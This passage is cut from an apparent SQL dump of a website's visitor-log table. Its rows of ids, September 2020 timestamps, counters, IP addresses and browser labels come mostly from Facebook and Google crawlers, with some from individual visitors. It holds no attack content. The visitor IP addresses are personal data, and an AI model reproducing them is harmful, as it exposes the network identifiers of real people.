1,1,0,0,'69.171.251.1','other'),(537815,1600194736,2,2,0,0,'69.171.251.22','other'),(537816,1600194741,2,2,0,0,'173.252.95.4','other'),(537817,1600194742,1,1,0,0,'173.252.127.112','other'),(537818,1600194756,1,1,0,0,'66.220.149.21','other'),(537819,1600194760,1,1,0,0,'69.171.251.18','other'),(537820,1600194761,2,2,0,0,'69.171.251.37','other'),(537821,1600194773,1,1,0,0,'173.252.95.39','other'),(537822,1600194782,1,1,0,0,'173.252.127.34','other'),(537823,1600194789,1,1,0,0,'91.196.178.89','chrome'),(537824,1600194797,1,1,0,0,'69.171.251.14','other'),(537825,1600194799,1,1,0,0,'173.252.107.3','other'),(537826,1600194817,1,1,0,0,'66.220.149.112','other'),(537827,1600194820,1,1,0,0,'37.73.220.94','chrome'),(537828,1600194834,1,1,0,0,'66.220.149.2','other'),(537829,1600194860,1,1,0,0,'69.171.251.7','other'),(537830,1600194861,1,1,0,0,'66.220.149.30','other'),(537831,1600194874,1,1,0,0,'66.220.149.27','other'),(537832,1600194883,1,1,0,0,'173.252.95.119','other'),(537833,1600194892,1,1,0,0,'66.220.149.13','other'),(537834,1600194902,1,1,0,0,'66.220.149.31','other'),(537835,1600194945,1,1,0,0,'31.13.127.113','other'),(537836,1600194957,1,1,0,0,'128.124.141.203','chrome'),(537837,1600195014,1,1,0,0,'91.231.43.74','chrome'),(537839,1600195034,1,1,0,0,'173.252.95.17','other'),(537840,1600195127,1,1,0,0,'91.196.178.74','chrome'),(537841,1600195158,2,2,0,0,'66.220.149.9','other'),(537842,1600195186,1,1,0,0,'91.196.178.21','chrome'),(537843,1600195199,1,1,0,0,'173.252.95.13','other'),(537844,1600195231,1,1,0,0,'66.220.149.35','other'),(537845,1600195248,1,1,0,0,'31.13.127.11','other'),(537846,1600195254,1,1,0,0,'173.252.95.22','other'),(537847,1600195264,1,1,0,0,'173.252.95.120','other'),(537848,1600195268,1,1,0,0,'69.171.251.118','other'),(537849,1600195330,1,1,0,0,'66.220.149.28','other'),(537850,1600195340,1,1,0,0,'173.252.95.8','other'),(537851,1600195344,2,2,0,0,'31.13.127.15','other'),(537852,1600195358,1,1,0,0,'69.171.251.26','other'),(537853,1600195360,1,1,0,0,'173.252.95.1','other'),(537854,1600195415,1,1,0,0,'173.252.127.111','other'),(537855,1600195443,1,1,0,0,'146.0.82.36','other'),(537856,1600195530,1,1,0,0,'173.252.127.120','other'),(537857,1600195547,1,1,0,0,'69.171.251.34','other'),(537858,1600195580,1,1,0,0,'31.13.127.18','other'),(537859,1600195651,1,1,0,0,'91.196.178.2','chrome'),(537860,1600195665,1,1,0,0,'31.13.103.22','other'),(537861,1600195680,1,1,0,0,'66.220.149.22','other'),(537862,1600195789,1,1,0,0,'66.220.149.1','other'),(537863,1600195848,1,1,0,0,'173.252.95.30','other'),(537864,1600195879,1,1,0,0,'173.252.95.5','other'),(537865,1600195890,1,1,0,0,'173.252.127.5','other'),(537866,1600195904,1,1,0,0,'31.13.127.4','other'),(537867,1600195932,1,1,0,0,'173.252.95.15','other'),(537868,1600195933,2,2,0,0,'173.252.95.4','other'),(537869,1600195939,1,1,0,0,'31.13.127.112','other'),(537870,1600195951,1,1,0,0,'69.171.251.116','other'),(537871,1600196128,1,1,0,0,'173.252.95.16','other'),(537872,1600196135,1,1,0,0,'66.220.149.10','other'),(537873,1600196188,2,2,0,0,'69.171.251.13','other'),(537874,1600196210,1,1,0,0,'31.13.103.116','other'),(537875,1600196217,1,1,0,0,'66.220.149.35','other'),(537876,1600196267,1,1,0,0,'173.252.127.29','other'),(537877,1600196272,1,1,0,0,'173.252.95.120','other'),(537878,1600196308,1,1,0,0,'173.252.95.118','other'),(537879,1600196316,1,1,0,0,'69.171.251.111','other'),(537880,1600196387,1,1,0,0,'173.252.127.16','other'),(537881,1600196421,1,1,0,0,'69.171.251.37','other'),(537882,1600196426,1,1,0,0,'66.220.149.26','other'),(537883,1600196467,1,1,0,0,'173.252.95.10','other'),(537884,1600196477,2,2,0,0,'46.211.45.60','chrome'),(537885,1600196510,1,1,0,0,'69.171.251.9','other'),(537886,1600196523,1,1,0,0,'31.13.127.21','other'),(537887,1600196535,1,1,0,0,'69.171.251.113','other'),(537888,1600196544,1,1,0,0,'31.13.127.10','other'),(537889,1600196553,1,1,0,0,'173.252.111.7','other'),(537890,1600196569,1,1,0,0,'31.13.127.9','other'),(537892,1600196578,1,1,0,0,'31.13.127.113','other'),(537893,1600196595,1,1,0,0,'31.13.127.12','other'),(537894,1600196596,1,1,0,0,'173.252.95.14','other'),(537895,1600196710,1,1,0,0,'130.180.209.27','chrome'),(537896,1600196736,1,1,0,0,'173.252.95.38','other'),(537897,1600196789,1,1,0,0,'69.171.251.27','other'),(537898,1600196821,1,1,0,0,'66.220.149.23','other'),(537899,1600196941,1,1,0,0,'173.252.127.23','other'),(537900,1600196984,1,1,0,0,'173.252.95.34','other'),(537901,1600196997,1,1,0,0,'69.171.251.38','other'),(537902,1600197027,1,1,0,0,'66.220.149.18','other'),(537903,1600197071,1,1,0,0,'66.220.149.3','other'),(537904,1600197192,1,1,0,0,'66.220.149.35','other'),(537905,1600197204,1,1,0,0,'69.171.251.10','other'),(537906,1600197205,1,1,0,0,'31.13.127.13','other'),(537907,1600197251,1,1,0,0,'173.252.95.3','other'),(537908,1600197325,1,1,0,0,'66.220.149.11','other'),(537909,1600197326,1,1,0,0,'69.171.251.118','other'),(537910,1600197345,1,1,0,0,'173.252.95.9','other'),(537911,1600197373,1,1,0,0,'173.252.87.13','other'),(537912,1600197404,1,1,0,0,'31.13.127.22','other'),(537914,1600197421,1,1,0,0,'173.252.95.35','other'),(537915,1600197458,1,1,0,0,'173.252.95.29','other'),(537917,1600197468,1,1,0,0,'173.252.95.20','other'),(537918,1600197488,1,1,0,0,'69.171.251.9','other'),(537919,1600197493,1,1,0,0,'91.196.178.113','chrome'),(537920,1600197505,1,1,0,0,'130.180.216.25','chrome'),(537921,1600197583,1,1,0,0,'46.211.81.35','chrome'),(537922,1600197603,1,1,0,0,'69.171.251.35','other'),(537923,1600197725,1,1,0,0,'173.252.111.20','other'),(537924,1600197742,1,1,0,0,'66.220.149.111','other'),(537925,1600197746,1,1,0,0,'66.220.149.2','other'),(537926,1600197756,1,1,0,0,'69.171.251.20','other'),(537927,1600197758,1,1,0,0,'91.196.178.50','other'),(537928,1600197791,1,1,0,0,'91.196.178.115','chrome'),(537929,1600197895,1,1,0,0,'31.13.127.7','other'),(537930,1600197946,1,1,0,0,'69.171.251.14','other'),(537931,1600198004,1,1,0,0,'66.220.149.113','other'),(537932,1600198024,1,1,0,0,'173.252.95.118','other'),(537933,1600198033,1,1,0,0,'173.252.95.12','other'),(537934,1600198058,1,1,0,0,'195.34.207.17','chrome'),(537935,1600198086,1,1,0,0,'66.220.149.26','other'),(537936,1600198088,1,1,0,0,'173.252.95.23','other'),(537937,1600198089,1,1,0,0,'31.13.127.23','other'),(537938,1600198294,1,1,0,0,'173.252.95.30','other'),(537939,1600198309,1,1,0,0,'91.196.178.2','chrome'),(537940,1600198401,1,1,0,0,'66.220.149.30','other'),(537941,1600198511,1,1,0,0,'91.196.178.108','chrome'),(537942,1600198529,1,1,0,0,'173.252.127.113','other'),(537944,1600198591,1,1,0,0,'173.252.127.10','other'),(537945,1600198694,1,1,0,0,'95.133.238.187','chrome'),(537946,1600198702,1,1,0,0,'173.252.95.120','other'),(537947,1600198722,1,1,0,0,'173.252.95.18','other'),(537948,1600198844,1,1,0,0,'173.252.111.1','other'),(537949,1600198983,1,1,0,0,'31.13.127.24','other'),(537950,1600199052,1,1,0,0,'46.211.13.251','chrome'),(537951,1600199058,1,1,0,0,'173.252.107.111','other'),(537952,1600199059,1,1,0,0,'173.252.107.13','other'),(537955,1600199066,1,1,0,0,'173.252.95.4','other'),(537956,1600199114,1,1,0,0,'173.252.127.18','other'),(537957,1600199146,1,1,0,0,'69.171.251.20','other'),(537958,1600199168,1,1,0,0,'173.252.95.27','other'),(537959,1600199194,1,1,0,0,'69.171.251.14','other'),(537960,1600199197,1,1,0,0,'66.220.149.26','other'),(537961,1600199296,1,1,0,0,'31.13.127.12','other'),(537962,1600199319,1,1,0,0,'173.252.127.12','other'),(537963,1600199344,1,1,0,0,'31.13.127.4','other'),(537964,1600199345,1,1,0,0,'185.234.67.31','chrome'),(537965,1600199368,2,2,0,0,'173.252.95.112','other'),(537966,1600199388,2,2,0,0,'173.252.95.21','other'),(537967,1600199394,1,1,0,0,'66.220.149.17','other'),(537968,1600199437,1,1,0,0,'173.252.95.38','other'),(537969,1600199481,1,1,0,0,'173.252.95.31','other'),(537970,1600199495,1,1,0,0,'69.171.251.111','other'),(537971,1600199518,1,1,0,0,'91.196.178.157','chrome'),(537972,1600199616,1,1,0,0,'173.252.95.20','other'),(537973,1600199701,2,2,0,0,'173.252.95.16','other'),(537974,1600199710,1,1,0,0,'69.171.251.27','other'),(537975,1600199729,1,1,0,0,'31.13.127.15','other'),(537976,1600199817,1,1,0,0,'69.171.251.28','other'),(537977,1600199859,1,1,0,0,'69.171.251.32','other'),(537978,1600199870,1,1,0,0,'173.252.127.32','other'),(537979,1600199999,1,1,0,0,'31.13.127.11','other'),(537980,1600200080,1,1,0,0,'91.196.178.7','chrome'),(537981,1600200144,1,1,0,0,'66.220.149.27','other'),(537982,1600200255,1,1,0,0,'69.171.251.12','other'),(537983,1600200355,1,1,0,0,'66.220.149.21','other'),(537984,1600200397,1,1,0,0,'173.252.95.15','other'),(537985,1600200401,1,1,0,0,'173.252.95.7','other'),(537986,1600200411,1,1,0,0,'66.220.149.4','other'),(537987,1600200494,1,1,0,0,'66.220.149.113','other'),(537988,1600200609,1,1,0,0,'173.252.95.31','other'),(537989,1600200623,1,1,0,0,'173.252.127.31','other'),(537990,1600200628,1,1,0,0,'173.252.95.18','other'),(537991,1600200649,1,1,0,0,'31.13.127.113','other'),(537992,1600200766,1,1,0,0,'69.171.251.11','other'),(537993,1600200821,1,1,0,0,'173.252.95.28','other'),(537994,1600200877,1,1,0,0,'69.171.251.117','other'),(537995,1600200955,1,1,0,0,'173.252.111.15','other'),(537996,1600200968,1,1,0,0,'31.13.127.8','other'),(537997,1600200973,1,1,0,0,'173.252.127.9','other'),(537998,1600201041,1,1,0,0,'66.220.149.34','other'),(537999,1600201056,1,1,0,0,'173.252.95.13','other'),(538000,1600201063,1,1,0,0,'173.252.95.6','other'),(538001,1600201067,1,1,0,0,'31.13.127.23','other'),(538002,1600201117,1,1,0,0,'173.252.95.120','other'),(538003,1600201121,1,1,0,0,'69.171.251.26','other'),(538004,1600201139,1,1,0,0,'173.252.127.34','other'),(538005,1600201158,1,1,0,0,'69.171.251.13','other'),(538006,1600201285,1,1,0,0,'31.13.127.120','other'),(538007,1600201373,1,1,0,0,'173.252.111.11','other'),(538008,1600201377,1,1,0,0,'193.56.151.172','chrome'),(538009,1600201398,1,1,0,0,'69.171.251.29','other'),(538010,1600201450,1,1,0,0,'173.252.95.11','other'),(538011,1600201576,1,1,0,0,'173.252.95.14','other'),(538012,1600201706,1,1,0,0,'173.252.95.15','other'),(538013,1600201942,1,1,0,0,'173.252.95.19','other'),(538014,1600201969,1,1,0,0,'31.13.127.5','other'),(538015,1600201987,1,1,0,0,'173.252.127.32','other'),(538016,1600202008,1,1,0,0,'31.13.127.22','other'),(538017,1600202022,1,1,0,0,'66.220.149.23','other'),(538018,1600202023,1,1,0,0,'69.171.251.12','other'),(538019,1600202200,2,2,0,0,'173.252.95.16','other'),(538020,1600202557,1,1,0,0,'173.252.95.111','other'),(538021,1600202673,1,1,0,0,'173.252.95.41','other'),(538022,1600202768,1,1,0,0,'69.171.251.11','other'),(538023,1600202793,1,1,0,0,'31.13.127.1','other'),(538024,1600202890,1,1,0,0,'195.28.31.237','chrome'),(538025,1600203129,1,1,0,0,'91.196.178.55','chrome'),(538026,1600203222,1,1,0,0,'173.252.95.34','other'),(538027,1600203249,1,1,0,0,'31.13.127.9','other'),(538028,1600203280,1,1,0,0,'173.252.95.10','other'),(538029,1600203292,1,1,0,0,'173.252.95.13','other'),(538030,1600203374,1,1,0,0,'31.13.127.111','other'),(538031,1600203689,1,1,0,0,'69.171.251.24','other'),(538032,1600203923,1,1,0,0,'173.252.95.18','other'),(538033,1600203924,1,1,0,0,'31.13.127.24','other'),(538034,1600204599,1,1,0,0,'69.171.251.14','other'),(538035,1600204957,1,1,0,0,'31.13.127.118','other'),(538036,1600205035,1,0,1,0,'66.249.70.45',''),(538037,1600205036,1,0,1,0,'66.249.70.47',''),(538038,1600205440,1,1,0,0,'173.252.95.31','other'),(538039,1600205534,1,1,0,0,'173.252.87.11','other'),(538040,1600205536,1,1,0,0,'69.171.251.13','other'),(538041,1600205544,1,1,0,0,'173.252.95.32','other'),(538042,1600205676,1,1,0,0,'31.13.127.15','other'),(538043,1600206307,1,1,0,0,'173.252.95.35','other'),(538044,1600206523,1,1,0,0,'173.252.95.2','other'),(538045,1600206555,1,1,0,0,'31.13.127.10','other'),(538046,1600206885,1,1,0,0,'173.252.95.9','other'),(538047,1600206990,1,1,0,0,'31.13.127.9','other'),(538048,1600207134,1,1,0,0,'69.171.251.29','other'),(538049,1600207140,1,1,0,0,'66.220.149.7','other'),(538050,1600207205,1,1,0,0,'173.252.95.111','other'),(538051,1600208373,1,1,0,0,'173.252.95.23','other'),(538052,1600208487,1,1,0,0,'173.252.127.6','other'),(538053,1600208488,1,1,0,0,'37.73.185.235','chrome'),(538054,1600208628,1,1,0,0,'173.252.95.33','other'),(538055,1600208636,1,1,0,0,'173.252.127.117','other'),(538056,1600208812,1,1,0,0,'66.220.149.1','other'),(538057,1600208954,1,1,0,0,'69.171.251.118','other'),(538058,1600208956,1,1,0,0,'31.13.127.8','other'),(538059,1600209320,1,1,0,0,'173.252.95.7','other'),(538060,1600210126,1,1,0,0,'173.252.95.13','other'),(538061,1600210227,1,1,0,0,'31.13.127.19','other'),(538062,1600211070,1,1,0,0,'31.13.127.3','other'),(538063,1600211403,1,1,0,0,'69.171.251.9','other'),(538064,1600211784,1,1,0,0,'31.13.127.1','other'),(538066,1600211910,1,1,0,0,'46.211.64.179','chrome'),(538067,1600212116,1,1,0,0,'173.252.95.32','other'),(538068,1600212410,1,1,0,0,'31.13.127.4','other'),(538069,1600212635,1,1,0,0,'66.220.149.26','other'),(538070,1600212675,1,1,0,0,'31.13.103.4','other'),(538071,1600212919,1,1,0,0,'173.252.95.116','other'),(538072,1600212986,1,1,0,0,'69.171.251.3','other'),(538073,1600213043,1,1,0,0,'31.13.103.9','other'),(538074,1600213489,1,1,0,0,'31.13.103.1','other'),(538075,1600213520,1,1,0,0,'5.255.253.87','other'),(538076,1600213664,1,1,0,0,'173.252.95.25','other'),(538077,1600213712,1,1,0,0,'31.13.103.21','other'),(538078,1600214790,1,1,0,0,'31.13.127.120','other'),(538079,1600216123,1,1,0,0,'173.252.95.26','other'),(538080,1600216210,1,1,0,0,'173.252.111.116','other'),(538081,1600217428,1,1,0,0,'66.220.149.27','other'),(538082,1600217982,1,1,0,0,'173.252.127.30','other'),(538083,1600218141,1,1,0,0,'173.252.111.17','other'),(538084,1600219600,1,1,0,0,'69.171.251.119','other'),(538085,1600219723,2,2,0,0,'31.13.103.22','other'),(538086,1600219756,1,1,0,0,'69.171.251.29','other'),(538087,1600219973,1,1,0,0,'173.252.111.14','other'),(538088,1600220157,1,1,0,0,'69.171.251.14','other'),(538089,1600220324,1,1,0,0,'173.252.95.116','other'),(538090,1600220510,1,1,0,0,'69.171.251.27','other'),(538091,1600221149,1,1,0,0,'31.13.103.5','other'),(538093,1600221421,1,1,0,0,'5.255.253.92','other'),(538094,1600221830,1,1,0,0,'31.13.103.11','other'),(538095,1600224195,1,1,0,0,'66.220.149.21','other'),(538096,1600224202,1,1,0,0,'69.171.251.113','other'),(538097,1600224361,1,1,0,0,'31.13.103.5','other'),(538098,1600224932,1,1,0,0,'31.13.115.14','other'),(538099,1600225159,1,1,0,0,'69.171.251.13','other'),(538100,1600225318,2,2,0,0,'66.220.149.111','other'),(538101,1600225324,1,1,0,0,'173.252.95.27','other'),(538102,1600225332,1,1,0,0,'31.13.103.21','other'),(538103,1600225567,1,1,0,0,'31.13.103.6','other'),(538104,1600225760,1,1,0,0,'173.252.95.12','other'),(538105,1600225883,1,1,0,0,'66.220.149.27','other'),(538106,1600225891,1,1,0,0,'173.252.95.119','other'),(538107,1600225895,1,1,0,0,'31.13.103.118','other'),(538108,1600225989,1,1,0,0,'173.252.95.22','other'),(538109,1600226028,1,1,0,0,'173.252.95.117','other'),(538110,1600226029,1,1,0,0,'173.252.111.13','other'),(538111,1600226622,1,1,0,0,'173.252.95.13','other'),(538112,1600226640,1,1,0,0,'31.13.103.113','other'),(538113,1600226832,1,1,0,0,'31.13.115.118','other'),(538114,1600227044,1,0,1,0,'66.249.70.43',''),(538115,1600227148,1,1,0,0,'91.196.178.130','chrome'),(538116,1600227469,2,2,0,0,'91.196.178.2','chrome'),(538117,1600227495,1,1,0,0,'31.13.103.16','other'),(538118,1600227597,1,1,0,0,'173.252.127.19','other'),(538120,1600227621,1,1,0,0,'173.252.95.10','other'),(538121,1600227706,1,1,0,0,'173.252.95.13','other'),(538122,1600228069,1,1,0,0,'173.252.95.15','other'),(538123,1600228243,1,1,0,0,'31.13.103.14','other'),(538124,1600228244,1,1,0,0,'69.171.251.29','other'),(538125,1600228574,1,1,0,0,'31.13.103.20','other'),(538126,1600228648,1,1,0,0,'173.252.95.32','other'),(538127,1600228797,1,1,0,0,'173.252.95.13','other'),(538128,1600228911,1,1,0,0,'91.196.121.134','chrome'),(538129,1600229047,2,2,0,0,'69.171.251.117','other'),(538130,1600229094,1,1,0,0,'31.13.103.6','other'),(538131,1600229113,1,1,0,0,'31.13.103.111','other'),(538132,1600229128,1,1,0,0,'91.196.178.2','chrome'),(538133,1600229362,1,1,0,0,'66.220.149.12','other'),(538134,1600229465,1,1,0,0,'31.13.127.4','other'),(538135,1600229700,2,2,0,0,'173.252.95.40','other'),(538136,1600229711,1,1,0,0,'173.252.95.6','other'),(538137,1600229986,1,1,0,0,'66.220.149.120','other'),(538138,1600230153,1,1,0,0,'176.8.2.177','chrome'),(538139,1600230219,1,1,0,0,'66.220.149.111','other'),(538140,1600230234,1,1,0,0,'173.252.127.116','other'),(538141,1600230637,1,1,0,0,'66.220.149.10','other'),(538142,1600230708,1,1,0,0,'31.13.103.2','other'),(538143,1600230709,1,1,0,0,'173.252.95.38','other'),(538144,1600230781,1,1,0,0,'31.13.127.117','other'),(538145,1600230910,1,1,0,0,'173.252.95.120','other'),(538146,1600230944,1,1,0,0,'31.13.127.11','other'),(538147,1600231108,1,1,0,0,'31.13.127.6','other'),(538148,1600231134,1,1,0,0,'173.252.95.16','other'),(538149,1600231471,1,1,0,0,'31.13.127.120','other'),(538150,1600231518,1,1,0,0,'173.252.95.13','other'),(538151,1600231573,1,1,0,0,'69.171.251.113','other'),(538152,1600231575,1,1,0,0,'91.196.178.37','chrome'),(538153,1600231615,1,1,0,0,'173.252.95.19','other'),(538154,1600232074,1,1,0,0,'31.13.127.14','other'),(538155,1600232230,1,1,0,0,'69.171.251.27','other'),(538156,1600232390,1,1,0,0,'173.252.95.21','other'),(538157,1600232459,1,1,0,0,'69.171.251.22','other'),(538158,1600232460,1,1,0,0,'173.252.95.31','other'),(538159,1600232996,1,1,0,0,'66.220.149.112','other'),(538160,1600233216,1,1,0,0,'91.196.178.8','chrome'),(538161,1600233307,1,1,0,0,'93.75.179.218','other'),(538162,1600233319,1,1,0,0,'173.252.79.12','other'),(538163,1600233414,1,1,0,0,'88.155.138.228','chrome'),(538164,1600233428,1,1,0,0,'173.252.127.18','other'),(538165,1600233487,1,1,0,0,'91.196.178.41','chrome'),(538166,1600233535,1,1,0,0,'31.13.127.1','other'),(538167,1600233538,1,1,0,0,'31.13.127.10','other'),(538169,1600233539,1,1,0,0,'31.13.127.20','other'),(538170,1600233541,2,2,0,0,'31.13.127.116','other'),(538171,1600233581,1,1,0,0,'173.252.127.13','other'),(538172,1600233647,1,1,0,0,'173.252.95.111','other'),(538173,1600234092,1,1,0,0,'31.13.127.16','other'),(538174,1600234163,1,1,0,0,'173.252.95.19','other'),(538175,1600234374,1,1,0,0,'173.252.95.113','other'),(538176,1600234434,1,1,0,0,'173.252.95.11','other'),(538177,1600234457,1,1,0,0,'31.13.127.12','other'),(538178,1600234463,1,1,0,0,'92.100.110.227','other'),(538179,1600234546,1,1,0,0,'173.252.95.15','other'),(538180,1600234554,1,1,0,0,'66.220.149.119','other'),(538181,1600234786,1,1,0,0,'173.252.95.5','other'),(538182,1600234998,1,1,0,0,'173.252.95.36','other'),(538183,1600235049,1,1,0,0,'69.171.251.22','other'),(538184,1600235259,1,1,0,0,'88.155.138.228','chrome'),(538185,1600235277,1,1,0,0,'91.196.178.58','chrome'),(538186,1600235288,1,1,0,0,'173.252.95.7','other'),(538187,1600235456,1,1,0,0,'173.252.95.32','other'),(538188,1600235496,1,1,0,0,'66.220.149.4','other'),(538189,1600235651,1,1,0,0,'31.13.127.118','other'),(538190,1600235704,1,1,0,0,'173.252.95.3','other'),(538191,1600235720,1,1,0,0,'173.252.95.21','other'),(538192,1600235793,1,1,0,0,'69.171.251.9','other'),(538193,1600235813,1,1,0,0,'91.196.178.81','chrome'),(538194,1600235843,1,1,0,0,'69.171.251.7','other'),(538195,1600235872,1,1,0,0,'91.196.178.2','chrome'),(538196,1600235904,2,2,0,0,'31.13.127.15','other'),(538197,1600235905,1,1,0,0,'31.13.127.112','other'),(538198,1600235911,1,1,0,0,'69.171.251.8','other'),(538199,1600236337,1,1,0,0,'46.211.40.188','chrome'),(538200,1600236466,1,1,0,0,'91.196.178.178','chrome'),(538201,1600236472,1,1,0,0,'173.252.95.117','other'),(538202,1600236597,1,1,0,0,'66.220.149.113','other'),(538203,1600236606,1,1,0,0,'31.13.127.19','other'),(538204,1600236607,1,1,0,0,'31.13.127.5','other'),(538207,1600236608,1,1,0,0,'31.13.127.7','other'),(538210,1600236620,1,1,0,0,'31.13.103.112','other'),(538211,1600236621,1,1,0,0,'31.13.127.16','other'),(538214,1600236699,1,1,0,0,'31.13.127.14','other'),(538215,1600236752,1,1,0,0,'88.155.141.187','chrome'),(538216,1600236763,1,1,0,0,'173.252.95.2','other'),(538217,1600236778,1,1,0,0,'91.196.177.208','chrome'),(538218,1600236991,1,1,0,0,'178.133.101.226','chrome'),(538219,1600237224,1,1,0,0,'91.196.178.2','chrome'),(538220,1600237371,1,1,0,0,'46.211.11.23','other'),(538221,1600237443,1,1,0,0,'195.10.210.49','chrome'),(538222,1600237610,3,3,0,0,'91.196.178.138','chrome'),(538223,1600237636,1,1,0,0,'91.196.178.147','chrome'),(538224,1600237637,1,1,0,0,'46.211.10.106','chrome'),(538225,1600237662,1,1,0,0,'91.196.178.171','chrome'),(538226,1600237703,1,1,0,0,'82.207.73.218','chrome'),(538227,1600237748,1,1,0,0,'91.196.179.33','chrome'),(538228,1600237757,1,1,0,0,'130.180.208.2','chrome'),(538229,1600237780,1,1,0,0,'173.252.95.38','other'),(538230,1600237806,1,1,0,0,'31.13.127.5','other'),(538231,1600237972,1,1,0,0,'69.171.251.3','other'),(538232,1600238043,1,1,0,0,'198.16.78.44','chrome'),(538233,1600238167,1,1,0,0,'173.252.95.112','other'),(538234,1600238166,1,1,0,0,'37.73.190.178','chrome'),(538235,1600238252,1,1,0,0,'66.220.149.27','other'),(538236,1600238378,1,1,0,0,'31.13.127.14','other'),(538237,1600238379,1,1,0,0,'173.252.95.20','other'),(538238,1600238438,1,1,0,0,'94.153.30.255','other'),(538239,1600238658,1,1,0,0,'178.133.60.168','chrome'),(538240,1600238691,1,1,0,0,'173.252.95.31','other'),(538241,1600238849,1,1,0,0,'69.171.251.14','other'),(538242,1600238961,1,1,0,0,'69.171.251.18','other'),(538243,1600238964,1,1,0,0,'94.153.0.120','chrome'),(538244,1600238984,1,1,0,0,'31.13.127.118','other'),(538245,1600239252,1,1,0,0,'91.196.121.135','chrome'),(538246,1600239351,1,1,0,0,'91.196.178.171','chrome'),(538247,1600239443,1,1,0,0,'173.252.95.36','other'),(538248,1600239543,1,1,0,0,'37.73.129.164','chrome'),(538249,1600239707,1,1,0,0,'173.252.95.2','other'),(538250,1600239838,1,1,0,0,'46.211.55.142','other'),(538251,1600239853,1,1,0,0,'173.252.127.3','other'),(538252,1600239900,1,1,0,0,'31.13.127.120','other'),(538254,1600239905,1,1,0,0,'91.196.178.173','other'),(538255,1600239907,1,1,0,0,'66.220.149.3','other'),(538256,1600239940,1,1,0,0,'94.153.228.86','chrome'),(538257,1600240040,1,1,0,0,'173.252.95.13','other'),(538258,1600240064,1,1,0,0,'37.73.223.162','chrome'),(538259,1600240231,1,1,0,0,'46.211.64.61','chrome'),(538260,1600240296,1,1,0,0,'173.252.95.30','other'),(538261,1600240412,1,1,0,0,'173.252.95.5','other'),(538262,1600240466,1,1,0,0,'94.246.152.223','chrome'),(538263,1600240519,1,1,0,0,'46.211.40.214','chrome'),(538264,1600240767,1,1,0,0,'94.153.20.187','chrome'),(538265,1600240899,1,1,0,0,'95.135.241.127','chrome'),(538266,1600241100,1,1,0,0,'173.252.95.37','other'),(538267,1600241101,1,1,0,0,'31.13.127.16','other'),(538268,1600241106,1,1,0,0,'31.13.127.118','other'),(538269,1600241258,1,1,0,0,'46.211.72.216','chrome'),(538270,1600241263,1,1,0,0,'66.220.149.13','other'),(538271,1600241377,1,1,0,0,'66.220.149.26','other'),(538272,1600241597,1,1,0,0,'94.153.34.17','chrome'),(538273,1600241901,1,1,0,0,'173.252.95.118','other'),(538274,1600242377,1,1,0,0,'31.13.127.1','other'),(538275,1600242566,1,1,0,0,'69.171.251.15','other'),(538276,1600242751,1,1,0,0,'88.155.46.109','chrome'),(538277,1600243149,1,1,0,0,'69.171.249.1','other'),(538278,1600243216,1,1,0,0,'66.220.149.34','other'),(538279,1600243239,1,1,0,0,'178.133.180.201','chrome'),(538280,1600243270,2,2,0,0,'31.13.127.120','other'),(538281,1600243273,2,2,0,0,'173.252.95.117','other'),(538282,1600243556,1,1,0,0,'91.196.178.2','chrome'),(538283,1600243754,1,1,0,0,'37.52.115.14','chrome'),(538284,1600243757,1,1,0,0,'31.13.103.17','other'),(538285,1600243790,1,1,0,0,'31.13.127.10','other'),(538286,1600243924,1,1,0,0,'173.252.95.116','other'),(538287,1600244078,1,1,0,0,'91.196.178.75','chrome'),(538288,1600244275,1,1,0,0,'95.132.13.181','firefox'),(538289,1600245543,1,1,0,0,'69.171.251.2','other'),(538290,1600245565,1,1,0,0,'31.13.127.4','other'),(538291,1600245605,1,1,0,0,'37.52.114.29','chrome'),(538292,1600245726,1,1,0,0,'37.73.100.150','other'),(538293,1600246244,1,1,0,0,'91.196.178.60','chrome'),(538294,1600246304,1,1,0,0,'66.220.149.120','other'),(538295,1600246377,1,1,0,0,'31.13.127.19','other'),(538296,1600246408,1,1,0,0,'69.171.251.13','other'),(538297,1600246506,1,1,0,0,'46.211.8.50','chrome'),(538298,1600246573,1,1,0,0,'173.252.95.111','other'),(538299,1600246939,1,1,0,0,'91.196.178.75','chrome'),(538300,1600247096,1,1,0,0,'31.13.127.15','other'),(538301,1600247514,1,1,0,0,'173.252.95.21','other'),(538302,1600247643,1,1,0,0,'37.73.14.130','other'),(538303,1600247822,1,1,0,0,'31.13.127.14','other'),(538304,1600247926,1,1,0,0,'91.196.178.151','chrome'),(538305,1600247997,1,1,0,0,'173.252.127.10','other'),(538306,1600249110,1,1,0,0,'69.171.251.118','other'),(538307,1600249124,1,1,0,0,'31.13.127.20','other'),(538308,1600249830,1,1,0,0,'66.220.149.21','other'),(538309,1600249927,1,1,0,0,'31.13.127.120','other'),(538310,1600250159,1,1,0,0,'194.44.207.176','chrome'),(538311,1600250904,1,1,0,0,'173.252.95.26','other'),(538312,1600250922,1,1,0,0,'31.13.127.118','other'),(538313,1600251495,1,1,0,0,'31.13.115.23','other'),(538314,1600251527,1,1,0,0,'173.252.95.117','other'),(538315,1600251919,1,1,0,0,'31.13.127.112','other'),(538316,1600252078,1,1,0,0,'173.252.95.10','other'),(538317,1600252108,1,1,0,0,'173.252.95.18','other'),(538318,1600252534,1,1,0,0,'69.171.251.112','other'),(538320,1600252768,1,1,0,0,'31.13.127.13','other'),(538321,1600252769,1,1,0,0,'173.252.95.113','other'),(538322,1600252869,1,1,0,0,'31.13.127.117','other'),(538323,1600252933,1,1,0,0,'91.196.178.6','chrome'),(538324,1600252958,1,1,0,0,'66.220.149.4','other'),(538325,1600253068,1,1,0,0,'46.211.44.230','other'),(538326,1600253200,1,1,0,0,'173.252.95.120','other'),(538327,1600253276,1,1,0,0,'69.171.251.28','other'),(538328,1600253717,1,1,0,0,'91.196.178.164','chrome'),(538329,1600254218,1,1,0,0,'173.252.95.31','other'),(538330,1600254945,1,1,0,0,'173.252.95.118','other'),(538331,1600254967,1,1,0,0,'31.13.127.17','other'),(538332,1600255881,1,1,0,0,'31.13.127.24','other'),(538333,1600256045,1,1,0,0,'31.13.127.4','other'),(538334,1600256426,1,1,0,0,'46.45.185.186','chrome'),(538335,1600256602,1,1,0,0,'31.13.127.16','other'),(538336,1600256604,1,1,0,0,'31.13.127.21','other'),(538337,1600256650,1,1,0,0,'94.153.67.140','chrome'),(538338,1600256651,1,1,0,0,'173.252.95.112','other'),(538339,1600256654,1,1,0,0,'31.13.127.117','other'),(538340,1600256674,1,1,0,0,'178.92.75.143','chrome'),(538341,1600256732,1,1,0,0,'173.252.127.117','other'),(538343,1600256734,1,1,0,0,'173.252.127.21','other'),(538344,1600256797,1,1,0,0,'173.252.95.22','other'),(538345,1600256816,1,1,0,0,'173.2